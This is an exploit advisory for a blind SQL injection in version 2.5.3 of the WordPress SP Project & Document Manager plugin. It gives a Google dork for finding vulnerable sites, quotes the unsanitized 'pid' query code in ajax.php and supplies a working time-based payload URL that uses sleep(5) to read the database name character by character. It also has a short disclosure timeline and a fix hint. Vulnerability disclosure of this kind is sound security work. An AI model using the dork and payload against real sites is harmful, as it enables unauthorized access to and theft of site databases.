# Exploit Title: WordPress SP Project & Document Manager 2.5.3 Blind SQL Injection
# Google Dork: inurl:wp-content/plugins/sp-client-document-manager
# Date: 2015-03-04
# Exploit Author: catsecurity
# Vendor Homepage: http://smartypantsplugins.com
# Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.2.5.3.zip
# Version: version 2.5.3 and previous version
# Tested on: Chrome (It's PHP Application)
# CVE : N/A


# Timeline #
[2015.03.05] Reported to the Vendor
[2015.03.06?] Fixed in Update 2.5.4


# Details #

- This vulnerability did not process integer parameters. Unauthorized users can attact the webstites that use this plugin.
- Vulnerability code in the thumbnails() function which exists in the [ /wp-content/plugins/sp-client-document-manager/ajax.php ].
- "pid" variable is not sanitized


# Vulnerable code #

Line 1132:        echo '<div id="dlg_cdm_thumbnails">';
Line 1133:        if ($_GET['pid'] != "") {
Line 1134:            $r_current_project = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu_project  WHERE id = " . $_GET['pid'] . "", ARRAY_A);
Line 1135:        }


# POC #
/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=[SQLi]

example:
/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=if(substr(database(),1,1)=0x61,sleep(5),1)

if yes it will sleep 5 seconds.


This vulnerable parameters must trance to integer